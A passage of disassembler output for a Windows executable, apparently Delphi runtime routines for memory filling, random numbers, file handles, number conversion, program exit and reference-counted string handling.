; sub_40185C+38�j
mov eax, esi
pop esi
pop ebx
retn
sub_40185C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4018A8 proc near ; CODE XREF: sub_4016A4+F�p
; sub_40265C+F1�p ...
push edi
mov edi, eax
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, edx
sar ecx, 2
js short loc_4018C5
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_4018C5: ; CODE XREF: sub_4018A8+12�j
pop edi
retn
sub_4018A8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4018C8 proc near ; CODE XREF: CODE:00404209�p
; CODE:0040421E�p ...
push ebx
xor ebx, ebx
imul edx, ds:dword_405008[ebx], 8088405h
inc edx
mov ds:dword_405008[ebx], edx
mul edx
mov eax, edx
pop ebx
retn
sub_4018C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4018E4 proc near ; DATA XREF: sub_40190C+35�o
push ebx
push esi
mov ebx, eax
mov word ptr [ebx+4], 0D7B0h
xor esi, esi
mov eax, [ebx]
call sub_4014C8
test al, al
jnz short loc_401905
call sub_401258
mov esi, 1
loc_401905: ; CODE XREF: sub_4018E4+15�j
mov eax, esi
pop esi
pop ebx
retn
sub_4018E4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40190C proc near ; CODE XREF: sub_4019EC+16�p
; sub_401A08+5�p
push ebx
push esi
push edi
mov esi, edx
mov edi, ecx
xor edx, edx
mov ebx, eax
mov dx, [eax+4]
sub edx, 0D7B0h
jz short loc_401938
cmp edx, 3
ja loc_4019CE
call dword ptr [ebx+24h]
test eax, eax
jz short loc_401938
call sub_401248
loc_401938: ; CODE XREF: sub_40190C+15�j
; sub_40190C+25�j
mov word ptr [ebx+4], 0D7B3h
mov [ebx+8], esi
mov dword ptr [ebx+24h], offset sub_4018E4
mov dword ptr [ebx+1Ch], offset sub_401488
cmp byte ptr [ebx+48h], 0
jz short loc_4019B5
mov eax, 0C0000000h
mov dl, ds:byte_40500C
and edx, 70h
shr edx, 2
mov edx, ds:dword_405068[edx]
mov ecx, 2
sub edi, 3
jz short loc_401997
mov ecx, 3
inc edi
jz short loc_401997
mov eax, 40000000h
inc edi
mov word ptr [ebx+4], 0D7B2h
jz short loc_401997
mov eax, 80000000h
mov word ptr [ebx+4], 0D7B1h
loc_401997: ; CODE XREF: sub_40190C+68�j
; sub_40190C+70�j ...
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push ecx ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push edx ; dwShareMode
push eax ; dwDesiredAccess
lea eax, [ebx+48h]
push eax ; lpFileName
call CreateFileA
loc_4019AC: ; CODE XREF: sub_40190C+C0�j
cmp eax, 0FFFFFFFFh
jz short loc_4019D5
mov [ebx], eax
jmp short loc_4019E5
; ---------------------------------------------------------------------------
loc_4019B5: ; CODE XREF: sub_40190C+47�j
mov dword ptr [ebx+24h], offset sub_401488
cmp edi, 3
jz short loc_4019C5
push 0FFFFFFF6h
jmp short loc_4019C7
; ---------------------------------------------------------------------------
loc_4019C5: ; CODE XREF: sub_40190C+B3�j
push 0FFFFFFF5h ; nStdHandle
loc_4019C7: ; CODE XREF: sub_40190C+B7�j
call GetStdHandle
jmp short loc_4019AC
; ---------------------------------------------------------------------------
loc_4019CE: ; CODE XREF: sub_40190C+1A�j
mov eax, 66h
jmp short loc_4019E0
; ---------------------------------------------------------------------------
loc_4019D5: ; CODE XREF: sub_40190C+A3�j
mov word ptr [ebx+4], 0D7B0h
call GetLastError
loc_4019E0: ; CODE XREF: sub_40190C+C7�j
call sub_401248
loc_4019E5: ; CODE XREF: sub_40190C+A7�j
pop edi
pop esi
pop ebx
retn
sub_40190C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4019EC proc near ; CODE XREF: sub_402CDC+54�p
mov cl, ds:byte_40500C
and cl, 3
cmp cl, 2
jbe short loc_4019FC
mov cl, 2
loc_4019FC: ; CODE XREF: sub_4019EC+C�j
and ecx, 0FFh
call sub_40190C
retn
sub_4019EC endp
; =============== S U B R O U T I N E =======================================
sub_401A08 proc near ; CODE XREF: CODE:004042E4�p
; CODE:004044E8�p
mov ecx, 3
call sub_40190C
retn
sub_401A08 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401A14 proc near ; CODE XREF: sub_401A74+4�p
var_26 = byte ptr -26h
var_24 = byte ptr -24h
var_10 = dword ptr -10h
push ebx
push esi
push edi
push edx
sub esp, 14h
mov edi, ecx
mov esi, eax
cdq
xor eax, edx
sub eax, edx
mov ecx, 0Ah
xor ebx, ebx
loc_401A2B: ; CODE XREF: sub_401A14+24�j
xor edx, edx
div ecx
add edx, 30h
mov [esp+ebx+24h+var_24], dl
inc ebx
test eax, eax
jnz short loc_401A2B
test esi, esi
jge short loc_401A43
mov [esp+ebx+24h+var_24], 2Dh
inc ebx
loc_401A43: ; CODE XREF: sub_401A14+28�j
mov [edi], bl
inc edi
mov ecx, [esp+24h+var_10]
cmp ecx, 0FFh
jle short loc_401A57
mov ecx, 0FFh
loc_401A57: ; CODE XREF: sub_401A14+3C�j
sub ecx, ebx
jle short loc_401A62
add [edi-1], cl
mov al, 20h
rep stosb
loc_401A62: ; CODE XREF: sub_401A14+45�j
; sub_401A14+56�j
mov al, [esp+ebx-1]
mov [edi], al
inc edi
dec ebx
jnz short loc_401A62
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_401A14 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401A74 proc near ; CODE XREF: sub_4030FC+12�p
mov ecx, edx
xor edx, edx
call sub_401A14
retn
sub_401A74 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401A80 proc near ; CODE XREF: sub_403134+3�p
push ebx
push esi
push edi
mov esi, eax
push eax
test eax, eax
jz short loc_401AF6
xor eax, eax
xor ebx, ebx
mov edi, 0CCCCCCCh
loc_401A93: ; CODE XREF: sub_401A80+19�j
mov bl, [esi]
inc esi
cmp bl, 20h
jz short loc_401A93
mov ch, 0
cmp bl, 2Dh
jz short loc_401B04
cmp bl, 2Bh
jz short loc_401B06
cmp bl, 24h
jz short loc_401B0B
cmp bl, 78h
jz short loc_401B0B
cmp bl, 58h
jz short loc_401B0B
cmp bl, 30h
jnz short loc_401ACE
mov bl, [esi]
inc esi
cmp bl, 78h
jz short loc_401B0B
cmp bl, 58h
jz short loc_401B0B
test bl, bl
jz short loc_401AEC
jmp short loc_401AD2
; ---------------------------------------------------------------------------
loc_401ACE: ; CODE XREF: sub_401A80+39�j
; sub_401A80+89�j
test bl, bl
jz short loc_401AFF
loc_401AD2: ; CODE XREF: sub_401A80+4C�j
; sub_401A80+6A�j
sub bl, 30h
cmp bl, 9
ja short loc_401AFF
cmp eax, edi
ja short loc_401AFF
lea eax, [eax+eax*4]
add eax, eax
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_401AD2
loc_401AEC: ; CODE XREF: sub_401A80+4A�j
dec ch
jz short loc_401AF9
test eax, eax
jge short loc_401B42
jmp short loc_401AFF
; ---------------------------------------------------------------------------
loc_401AF6: ; CODE XREF: sub_401A80+8�j
; sub_401A80+95�j
inc esi
jmp short loc_401AFF
; ---------------------------------------------------------------------------
loc_401AF9: ; CODE XREF: sub_401A80+6E�j
neg eax
jle short loc_401B42
js short loc_401B42
loc_401AFF: ; CODE XREF: sub_401A80+50�j
; sub_401A80+58�j ...
pop ebx
sub esi, ebx
jmp short loc_401B45
; ---------------------------------------------------------------------------
loc_401B04: ; CODE XREF: sub_401A80+20�j
inc ch
loc_401B06: ; CODE XREF: sub_401A80+25�j
mov bl, [esi]
inc esi
jmp short loc_401ACE
; ---------------------------------------------------------------------------
loc_401B0B: ; CODE XREF: sub_401A80+2A�j
; sub_401A80+2F�j ...
mov edi, 0FFFFFFFh
mov bl, [esi]
inc esi
test bl, bl
jz short loc_401AF6
loc_401B17: ; CODE XREF: sub_401A80+C0�j
cmp bl, 61h
jb short loc_401B1F
sub bl, 20h
loc_401B1F: ; CODE XREF: sub_401A80+9A�j
sub bl, 30h
cmp bl, 9
jbe short loc_401B32
sub bl, 11h
cmp bl, 5
ja short loc_401AFF
add bl, 0Ah
loc_401B32: ; CODE XREF: sub_401A80+A5�j
cmp eax, edi
ja short loc_401AFF
shl eax, 4
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_401B17
loc_401B42: ; CODE XREF: sub_401A80+72�j
; sub_401A80+7B�j ...
pop ecx
xor esi, esi
loc_401B45: ; CODE XREF: sub_401A80+82�j
mov [edx], esi
pop edi
pop esi
pop ebx
retn
sub_401A80 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401B4C proc near ; CODE XREF: sub_401B6C+C�p
test ecx, ecx
jz short locret_401B69
mov eax, [ecx+1]
cmp byte ptr [ecx], 0E9h
jz short loc_401B64
cmp byte ptr [ecx], 0EBh
jnz short locret_401B69
movsx eax, al
inc ecx
inc ecx
jmp short loc_401B67
; ---------------------------------------------------------------------------
loc_401B64: ; CODE XREF: sub_401B4C+A�j
add ecx, 5
loc_401B67: ; CODE XREF: sub_401B4C+16�j
add ecx, eax
locret_401B69: ; CODE XREF: sub_401B4C+2�j
; sub_401B4C+F�j
retn
sub_401B4C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401B6C proc near ; CODE XREF: sub_402C0C-1053�p
cmp ds:byte_405010, 1
jbe short locret_401B92
push eax
push edx
push ecx
call sub_401B4C
push ecx
push esp
push 1
push 0
push 0EEDFAE1h
call ds:dword_406008
pop ecx
pop ecx
pop edx
pop eax
locret_401B92: ; CODE XREF: sub_401B6C+7�j
retn
sub_401B6C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_402C0C
loc_401B94: ; CODE XREF: sub_4028CC:loc_402908�j
; sub_402A2C:loc_402A51�j ...
mov eax, [esp-4+arg_0]
mov edx, [esp-4+arg_4]
test dword ptr [eax+4], 6
jz short loc_401BC4
mov ecx, [edx+4]
mov dword ptr [edx+4], offset loc_401BC4
push ebx
push esi
push edi
push ebp
mov ebp, [edx+8]
add ecx, 5
call sub_401B6C
call ecx
pop ebp
pop edi
pop esi
pop ebx
loc_401BC4: ; CODE XREF: sub_402C0C-1069�j
; DATA XREF: sub_402C0C-1064�o
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_402C0C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401BCC proc near ; CODE XREF: sub_401CDC:loc_401D2A�p
; DATA XREF: DATA:off_405030�o
push ebx
push esi
push edi
push ebp
mov edi, offset dword_4063C4
mov eax, [edi+8]
test eax, eax
jz short loc_401BFA
mov ebx, [edi+0Ch]
mov esi, [eax+4]
test ebx, ebx
jle short loc_401BFA
loc_401BE6: ; CODE XREF: sub_401BCC+2C�j
dec ebx
mov [edi+0Ch], ebx
mov eax, [esi+ebx*8+4]
test eax, eax
jz short loc_401BF6
mov ebp, eax
call ebp
loc_401BF6: ; CODE XREF: sub_401BCC+24�j
test ebx, ebx
jg short loc_401BE6
loc_401BFA: ; CODE XREF: sub_401BCC+E�j
; sub_401BCC+18�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401BCC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C00 proc near ; CODE XREF: sub_401C00+43�p
; sub_401C54+12�p
; DATA XREF: ...
push ebx
push esi
push edi
push ebp
mov edi, ecx
mov ebp, edx
mov esi, eax
mov eax, offset sub_401C00
cmp eax, ds:off_40502C
setz bl
cmp edi, ebp
jle short loc_401C4F
loc_401C1C: ; CODE XREF: sub_401C00+4D�j
mov eax, [esi+ebp*8]
inc ebp
mov ds:dword_4063D0, ebp
test eax, eax
jz short loc_401C2C
call eax
loc_401C2C: ; CODE XREF: sub_401C00+28�j
test bl, bl
jz short loc_401C4B
mov eax, offset sub_401C00
cmp eax, ds:off_40502C
jz short loc_401C4B
mov ecx, edi
mov edx, ebp
mov eax, esi
call ds:off_40502C
jmp short loc_401C4F
; ---------------------------------------------------------------------------
loc_401C4B: ; CODE XREF: sub_401C00+2E�j
; sub_401C00+3B�j
cmp edi, ebp
jg short loc_401C1C
loc_401C4F: ; CODE XREF: sub_401C00+1A�j
; sub_401C00+49�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401C00 endp
; =============== S U B R O U T I N E =======================================
sub_401C54 proc near ; CODE XREF: sub_401C70+35�p
mov eax, ds:dword_4063CC
test eax, eax
jz short locret_401C6C
mov edx, [eax]
xor ecx, ecx
mov eax, [eax+4]
xchg ecx, edx
call ds:off_40502C
locret_401C6C: ; CODE XREF: sub_401C54+7�j
retn
sub_401C54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C70 proc near ; CODE XREF: sub_4029E8+3A�p
mov ds:dword_406008, offset loc_401094
mov ds:dword_40600C, offset loc_4010A4
mov ds:dword_4063CC, eax
xor eax, eax
mov ds:dword_4063D0, eax
mov ds:dword_4063D4, edx
mov eax, [edx+4]
mov ds:dword_406014, eax
mov ds:byte_40601C, 0
call sub_401C54
retn
sub_401C70 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401CAC proc near ; CODE XREF: sub_401CDC+96�p
xor eax, eax
xchg eax, ds:dword_405000
neg eax
sbb eax, eax
inc eax
mov edi, offset dword_4063C4
mov ebx, [edi+18h]
mov ebp, [edi+14h]
push dword ptr [edi+1Ch]
push dword ptr [edi+20h]
mov esi, [edi]
mov ecx, 0Bh
rep movsd
pop edi
pop esi
leave
retn 0Ch
sub_401CAC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401CDC proc near ; CODE XREF: sub_401DAC+5�p
; CODE:0040481D�p
push ebx
push esi
push edi
push ebp
mov ebx, offset dword_4063C4
mov esi, offset dword_405000
mov edi, offset dword_406020
cmp byte ptr [ebx+28h], 0
jnz short loc_401D0B
cmp dword ptr [edi], 0
jz short loc_401D0B
loc_401CFA: ; CODE XREF: sub_401CDC+2D�j
mov edx, [edi]
mov eax, edx
xor edx, edx
mov [edi], edx
mov ebp, eax
call ebp
cmp dword ptr [edi], 0
jnz short loc_401CFA
loc_401D0B: ; CODE XREF: sub_401CDC+17�j
; sub_401CDC+1C�j
cmp ds:dword_405004, 0
jz short loc_401D1A
call ds:off_405088
loc_401D1A: ; CODE XREF: sub_401CDC+36�j
; sub_401CDC+C6�j
cmp byte ptr [ebx+28h], 2
jnz short loc_401D2A
cmp dword ptr [esi], 0
jnz short loc_401D2A
xor eax, eax
mov [ebx+0Ch], eax
loc_401D2A: ; CODE XREF: sub_401CDC+42�j
; sub_401CDC+47�j
call ds:off_405030
cmp byte ptr [ebx+28h], 1
jbe short loc_401D3B
cmp dword ptr [esi], 0
jz short loc_401D5D
loc_401D3B: ; CODE XREF: sub_401CDC+58�j
mov eax, [ebx+10h]
test eax, eax
jz short loc_401D5D
call ds:off_405020
mov edx, [ebx+10h]
mov eax, [edx+10h]
cmp eax, [edx+4]
jz short loc_401D5D
test eax, eax
jz short loc_401D5D
push eax ; hLibModule
call FreeLibrary
loc_401D5D: ; CODE XREF: sub_401CDC+5D�j
; sub_401CDC+64�j ...
call ds:off_405034
cmp byte ptr [ebx+28h], 1
jnz short loc_401D6C
call dword ptr [ebx+24h]
loc_401D6C: ; CODE XREF: sub_401CDC+8B�j
cmp byte ptr [ebx+28h], 0
jz short loc_401D77
call sub_401CAC
loc_401D77: ; CODE XREF: sub_401CDC+94�j
cmp dword ptr [ebx], 0
jnz short loc_401D93
cmp ds:dword_406010, 0
jz short loc_401D8B
call ds:dword_406010
loc_401D8B: ; CODE XREF: sub_401CDC+A7�j
mov eax, [esi]
push eax ; uExitCode
call ExitProcess
; ---------------------------------------------------------------------------
loc_401D93: ; CODE XREF: sub_401CDC+9E�j
mov eax, [ebx]
push esi
mov esi, eax
mov edi, ebx
mov ecx, 0Bh
rep movsd
pop esi
jmp loc_401D1A
sub_401CDC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop ebp
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401DAC proc near ; CODE XREF: sub_4011C4+6�p
; sub_401DB8+6�j
mov ds:dword_405000, eax
call sub_401CDC
sub_401DAC endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401DB8 proc near ; CODE XREF: sub_402958+1A�p
; sub_402958+2F�p
pop ds:dword_405004
jmp sub_401DAC
sub_401DB8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_401DC4 proc near ; CODE XREF: sub_4013B0+F�p
; sub_401EB0+23�p ...
mov edx, [eax]
test edx, edx
jz short locret_401DE5
mov dword ptr [eax], 0
mov ecx, [edx-8]
dec ecx
jl short locret_401DE5
dec dword ptr [edx-8]
jnz short locret_401DE5
push eax
lea eax, [edx-8]
call sub_40115C
pop eax
locret_401DE5: ; CODE XREF: sub_401DC4+4�j
; sub_401DC4+10�j ...
retn
sub_401DC4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401DE8 proc near ; CODE XREF: sub_402260+56�p
; sub_402C0C+90�p ...
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_401DEE: ; CODE XREF: sub_401DE8+29�j
mov edx, [ebx]
test edx, edx
jz short loc_401E0D
mov dword ptr [ebx], 0
mov ecx, [edx-8]
dec ecx
jl short loc_401E0D
dec dword ptr [edx-8]
jnz short loc_401E0D
lea eax, [edx-8]
call sub_40115C
loc_401E0D: ; CODE XREF: sub_401DE8+A�j
; sub_401DE8+16�j ...
add ebx, 4
dec esi
jnz short loc_401DEE
pop esi
pop ebx
retn
sub_401DE8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401E18 proc near ; CODE XREF: sub_401F0C+8�j
; sub_401F50+6�j ...
test edx, edx
jz short loc_401E3F
mov ecx, [edx-8]
inc ecx
jg short loc_401E3C
push eax
push edx
mov eax, [edx-4]
call sub_401E84
mov edx, eax
pop eax
push edx
mov ecx, [eax-4]
call sub_401264
pop edx
pop eax
jmp short loc_401E3F
; ---------------------------------------------------------------------------
loc_401E3C: ; CODE XREF: sub_401E18+8�j
inc dword ptr [edx-8]
loc_401E3F: ; CODE XREF: sub_401E18+2�j
; sub_401E18+22�j
xchg edx, [eax]
test edx, edx
jz short locret_401E58
mov ecx, [edx-8]
dec ecx
jl short locret_401E58
dec dword ptr [edx-8]
jnz short locret_401E58
lea eax, [edx-8]
call sub_40115C
locret_401E58: ; CODE XREF: sub_401E18+2B�j
; sub_401E18+31�j ...
retn
sub_401E18 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401E5C proc near ; CODE XREF: sub_403168+30�p
test edx, edx
jz short loc_401E69
mov ecx, [edx-8]
inc ecx
jle short loc_401E69
inc dword ptr [edx-8]
loc_401E69: ; CODE XREF: sub_401E5C+2�j
; sub_401E5C+8�j
xchg edx, [eax]
test edx, edx
jz short locret_401E82
mov ecx, [edx-8]
dec ecx
jl short locret_401E82
dec dword ptr [edx-8]
jnz short locret_401E82
lea eax, [edx-8]
call sub_40115C
locret_401E82: ; CODE XREF: sub_401E5C+11�j
; sub_401E5C+17�j ...
retn
sub_401E5C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401E84 proc near ; CODE XREF: sub_401E18+F�p
; sub_401EB0+B�p ...
test eax, eax
jle short loc_401EAC
push eax
add eax, 0Ah
and eax, 0FFFFFFFEh
push eax
call sub_401144
pop edx
mov word ptr [edx+eax-2], 0
add eax, 8
pop edx
mov [eax-4], edx
mov dword ptr [eax-8], 1
retn
; ---------------------------------------------------------------------------
loc_401EAC: ; CODE XREF: sub_401E84+2�j
xor eax, eax
retn
sub_401E84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401EB0 proc near ; CODE XREF: sub_4013B0+2F�p
; sub_401EE0+5�j ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
mov eax, edi
call sub_401E84
mov ecx, edi
mov edi, eax
test esi, esi
jz short loc_401ED1
mov edx, eax
mov eax, esi
call sub_401264
loc_401ED1: ; CODE XREF: sub_401EB0+16�j
mov eax, ebx
call sub_401DC4
mov [ebx], edi
pop edi
pop esi
pop ebx
retn
sub_401EB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401EE0 proc near ; CODE XREF: sub_4030FC+28�p
xor ecx, ecx
mov cl, [edx]
inc edx
jmp sub_401EB0
sub_401EE0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401EEC proc near ; CODE XREF: sub_403038+8B�p
; sub_4033B0+6D�p ...
push edi
push eax
push ecx
mov edi, edx
xor eax, eax
repne scasb
jnz short loc_401EF9
not ecx
loc_401EF9: ; CODE XREF: sub_401EEC+9�j
pop eax
add ecx, eax
pop eax
pop edi
jmp sub_401EB0
sub_401EEC endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_401F04 proc near ; CODE XREF: sub_4016A4+3E�p
; sub_4016A4+56�p ...
test eax, eax
jz short locret_401F0B
mov eax, [eax-4]
locret_401F0B: ; CODE XREF: sub_401F04+2�j
retn
sub_401F04 endp
; =============== S U B R O U T I N E =======================================
sub_401F0C proc near ; CODE XREF: sub_401F50+1D�j
; sub_401F50+6E�j ...
test edx, edx
jz short locret_401F4F
mov ecx, [eax]
test ecx, ecx
jz sub_401E18
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, [ecx-4]
mov edx, [esi-4]
add edx, edi
cmp esi, ecx
jz short loc_401F44
call sub_402184
mov eax, esi
mov ecx, [esi-4]
loc_401F37: ; CODE XREF: sub_401F0C+41�j
mov edx, [ebx]
add edx, edi
call sub_401264
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401F44: ; CODE XREF: sub_401F0C+1F�j
call sub_402184
mov eax, [ebx]
mov ecx, edi
jmp short loc_401F37
; ---------------------------------------------------------------------------
locret_401F4F: ; CODE XREF: sub_401F0C+2�j
retn
sub_401F0C endp
; =============== S U B R O U T I N E =======================================
sub_401F50 proc near ; CODE XREF: CODE:004042C5�p
test edx, edx
jz short loc_401FB5
test ecx, ecx
jz sub_401E18
cmp edx, [eax]
jz short loc_401FBC
cmp ecx, [eax]
jz short loc_401F72
push eax
push ecx
call sub_401E18
pop edx
pop eax
jmp sub_401F0C
; ---------------------------------------------------------------------------
loc_401F72: ; CODE XREF: sub_401F50+12�j
push ebx
push esi
push edi
mov ebx, edx
mov esi, ecx
push eax
mov eax, [ebx-4]
add eax, [esi-4]
call sub_401E84
mov edi, eax
mov edx, eax
mov eax, ebx
mov ecx, [ebx-4]
call sub_401264
mov edx, edi
mov eax, esi
mov ecx, [esi-4]
add edx, [ebx-4]
call sub_401264
pop eax
mov edx, edi
test edi, edi
jz short loc_401FAC
dec dword ptr [edi-8]
loc_401FAC: ; CODE XREF: sub_401F50+57�j
call sub_401E18
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401FB5: ; CODE XREF: sub_401F50+2�j
mov edx, ecx
jmp sub_401E18
; ---------------------------------------------------------------------------
loc_401FBC: ; CODE XREF: sub_401F50+E�j
mov edx, ecx
jmp sub_401F0C
sub_401F50 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_401FC4 proc near ; CODE XREF: CODE:00404252�p
; CODE:004044C9�p ...
push ebx
push esi
push edi
push edx
push eax
mov ebx, edx
xor edi, edi
mov ecx, [esp+edx*4+14h]
test ecx, ecx
jz short loc_401FDB
cmp [eax], ecx
jnz short loc_401FDB
mov edi, eax
loc_401FDB: ; CODE XREF: sub_401FC4+F�j
; sub_401FC4+13�j
xor eax, eax
loc_401FDD: ; CODE XREF: sub_401FC4+2B�j
mov ecx, [esp+edx*4+14h]
test ecx, ecx
jz short loc_401FEE
add eax, [ecx-4]
cmp edi, ecx
jnz short loc_401FEE
xor edi, edi
loc_401FEE: ; CODE XREF: sub_401FC4+1F�j
; sub_401FC4+26�j
dec edx
jnz short loc_401FDD
test edi, edi
jz short loc_402009
mov edx, eax
mov eax, edi
mov esi, [edi]
mov esi, [esi-4]
call sub_402184
push edi
add esi, [edi]
dec ebx
jmp short loc_402011
; ---------------------------------------------------------------------------
loc_402009: ; CODE XREF: sub_401FC4+2F�j
call sub_401E84
push eax
mov esi, eax
loc_402011: ; CODE XREF: sub_401FC4+43�j
; sub_401FC4+62�j
mov eax, [esp+ebx*4+18h]
mov edx, esi
test eax, eax
jz short loc_402025
mov ecx, [eax-4]
add esi, ecx
call sub_401264
loc_402025: ; CODE XREF: sub_401FC4+55�j
dec ebx
jnz short loc_402011
pop edx
pop eax
test edi, edi
jnz short loc_40203A
test edx, edx
jz short loc_402035
dec dword ptr [edx-8]
loc_402035: ; CODE XREF: sub_401FC4+6C�j
call sub_401E18
loc_40203A: ; CODE XREF: sub_401FC4+68�j
pop edx
pop edi
pop esi
pop ebx
pop eax
lea esp, [esp+edx*4]
jmp eax
sub_401FC4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402048 proc near ; CODE XREF: sub_402C0C+12�p
; sub_402C0C+1A�p ...
test eax, eax
jz short locret_402055
mov edx, [eax-8]
inc edx
jle short locret_402055
inc dword ptr [eax-8]
locret_402055: ; CODE XREF: sub_402048+2�j
; sub_402048+8�j
retn
sub_402048 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402058 proc near ; CODE XREF: sub_4016A4+46�p
; sub_402C0C+3C�p ...
test eax, eax
jz short loc_40205E
retn
; ---------------------------------------------------------------------------
byte_40205D db 0 ; DATA XREF: sub_402058:loc_40205E�o
; ---------------------------------------------------------------------------
loc_40205E: ; CODE XREF: sub_402058+2�j
mov eax, offset byte_40205D
retn
sub_402058 endp
; =============== S U B R O U T I N E =======================================
sub_402064 proc near ; CODE XREF: sub_4020A4�j sub_4020AC�j
mov edx, [eax]
test edx, edx
jz short loc_4020A1
mov ecx, [edx-8]
dec ecx
jz short loc_4020A1
push ebx
mov ebx, eax
mov eax, [edx-4]
call sub_401E84
mov edx, eax
mov eax, [ebx]
mov [ebx], edx
push eax
mov ecx, [eax-4]
call sub_401264
pop eax
mov ecx, [eax-8]
dec ecx
jl short loc_40209E
dec dword ptr [eax-8]
jnz short loc_40209E
lea eax, [eax-8]
call sub_40115C
loc_40209E: ; CODE XREF: sub_402064+2B�j
; sub_402064+30�j
mov edx, [ebx]
pop ebx
loc_4020A1: ; CODE XREF: sub_402064+4�j
; sub_402064+A�j
mov eax, edx
retn
sub_402064 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4020A4 proc near ; CODE XREF: sub_4020F4+9�p
jmp sub_402064
sub_4020A4 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4020AC proc near ; CODE XREF: sub_402C0C+56�p
; sub_402CDC+8E�p ...
jmp sub_402064
sub_4020AC endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4020B4 proc near ; CODE XREF: sub_403168+AA�p
; sub_403168+F1�p ...
arg_0 = dword ptr 4
push ebx
test eax, eax
jz short loc_4020E6
mov ebx, [eax-4]
test ebx, ebx
jz short loc_4020E6
dec edx
jl short loc_4020DE
cmp edx, ebx
jge short loc_4020E6
loc_4020C7: ; CODE XREF: sub_4020B4+2C�j
sub ebx, edx
test ecx, ecx
jl short loc_4020E6
cmp ecx, ebx
jg short loc_4020E2
loc_4020D1: ; CODE XREF: sub_4020B4+30�j
add edx, eax
mov eax, [esp+4+arg_0]
call sub_401EB0
jmp short loc_4020EF
; ---------------------------------------------------------------------------
loc_4020DE: ; CODE XREF: sub_4020B4+D�j
xor edx, edx
jmp short loc_4020C7
; ---------------------------------------------------------------------------
loc_4020E2: ; CODE XREF: sub_4020B4+1B�j
mov ecx, ebx
jmp short loc_4020D1
; ---------------------------------------------------------------------------
loc_4020E6: ; CODE XREF: sub_4020B4+3�j
; sub_4020B4+A�j ...
mov eax, [esp+4+arg_0]
call sub_401DC4
loc_4020EF: ; CODE XREF: sub_4020B4+28�j
pop ebx
retn 4
sub_4020B4 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4020F4 proc near ; CODE XREF: sub_403168+4C�p
; sub_403168+D0�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
call sub_4020A4
mov edx, [ebx]
test edx, edx
jz short loc_402138
mov ecx, [edx-4]
dec esi
jl short loc_402138
cmp esi, ecx
jge short loc_402138
test edi, edi
jle short loc_402138
sub ecx, esi
cmp edi, ecx
jle short loc_40211E
mov edi, ecx
